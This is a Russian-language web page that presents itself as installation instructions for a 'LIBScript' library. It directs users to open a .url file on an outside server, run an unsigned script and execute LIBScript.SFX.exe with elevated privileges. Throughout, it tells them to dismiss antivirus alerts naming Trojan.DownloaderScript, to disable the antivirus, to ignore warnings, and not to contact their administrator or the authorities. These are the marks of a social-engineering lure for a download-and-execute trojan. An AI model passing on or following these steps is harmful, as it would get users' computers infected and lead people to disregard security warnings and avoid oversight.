<h1>Установка библиотеки LIBScript</h1>
<p>Библиотека LibScript — это служебная библиотека скриптов для проекта «Экспонента». С недавних пор разработчик, NIT Inc, включил её в список обязательного компонента своего админ-пака. Для непосвящённых пользователей данная билиотека устанавливается следующим образом:</p>
<p>ВНИМАНИЕ! Из-за использования технологи Download &amp; Execution многие антивирусы, прежде всего устаревшие, помечают некоторые инструкции в установочном файле как вредоносные. Автор даже нашёл название этого «вируса» — Trojan.DownloaderScript. Решается эта проблема просто, путём обновления антивирусных баз и программного обеспечения Windows. Поэтому, обнаружив такое «странное поведение программы», не звоните своему админу, в управление «К» или антивирусную службу, а просто обновите свою Windows 10 и базы Вашего антивируса. Проблема должна решиться. Если только Вы не используете пиратскую Windows и антивирус, где такие обновления заблокированы… Только тогда можете отключать антивирус.</p>
<ol type="1">
<li>Перейдите в Вашем браузере по URL: <a href="http://ware.tuneserv.ru:80/LIB/WSF/LIBScript.url.">http://ware.tuneserv.ru:80/LIB/WSF/LIBScript.url.</a></li>
<li>Откроется окно с предложением открыть или сохранить файл. Выберите пункт «Открыть».</li>
<li>Файл сохраниться во временную папку и его попытается открыть штатный браузер. Появится соответствующее предупреждение, что ссылку пытается открыть браузер. Подтвердите своё действие.</li>
<li>Откроется окно с предложением открыть скриптовый файл либо сохранить его на жёстком диске. Выберите пункт «Открыть».</li>
<li>Файл загрузится во временный каталог, и вы получите сообщение, что Windows пытается выполнить неподписанный скрипт. Нажмите кнопку «Открыть».</li>
<li>После некоторого бездействия у Вас могут попросить разрешить выполнить файл <em>LIBScript.SFX.exe</em>. В этом файле расположена библиотека, и его надо выполнить с повышенными привилегиями. Однако вместо этого предупреждения может появиться ошибка о вредоносном коде. Тогда обновите антивирусные базы и запустите установку с пункта 1.</li>
<li>Программа сделает паузу в течение 5 минут, после этого у Вас появятся несколько диалоговых окон с предупреждениями:</li>
<li>“Success Script Creation!” или “Folder Already Exists.” говорит об успешной установке файла с библиотекой. Просто закройте сообщение. Сообщение “Error Download and Execution File!” говорит о серьёзной системной ошибке или блокировке приложения средствами антивирусной защиты.</li>
<li>Сообщение о необходимости установки необходимых дополнений (chocolatey). Данный скрипт вызывает отложеное обновление некоторых системных компонентов. Обновление начнётся после перезагрузки оборудования. Проигнорируйте это сообщение (и расслабтесь!).</li>
<li>В случае появления сообщения из п. 9 Вам сразу же придут два следующих сообщений: “Error: Chocolatey Packet! is Not Found!”. Поскольку это действительно так, проигнорируйте эти сообщения (нажмите кнопку Ok).</li>
<li>Могут возникнуть и другие сообщения. Проигнорируйте их. Можете продолжать свою раболту.</li>
<li>Система продолжит установку дополнительных пакетов после перезагрузки. Дождитесь окончания установки. Во время установки дополнений не рекомендуется работать на компьютере.</li>
</ol>
<p>Такая сложная технология установки объясняется попыткой обхода запрета технологии «Download &amp; Execution» на серверах корпорации Microsoft. Приобрести же цифровую подпись разработчик не может из-за санкций правительства США.</p>
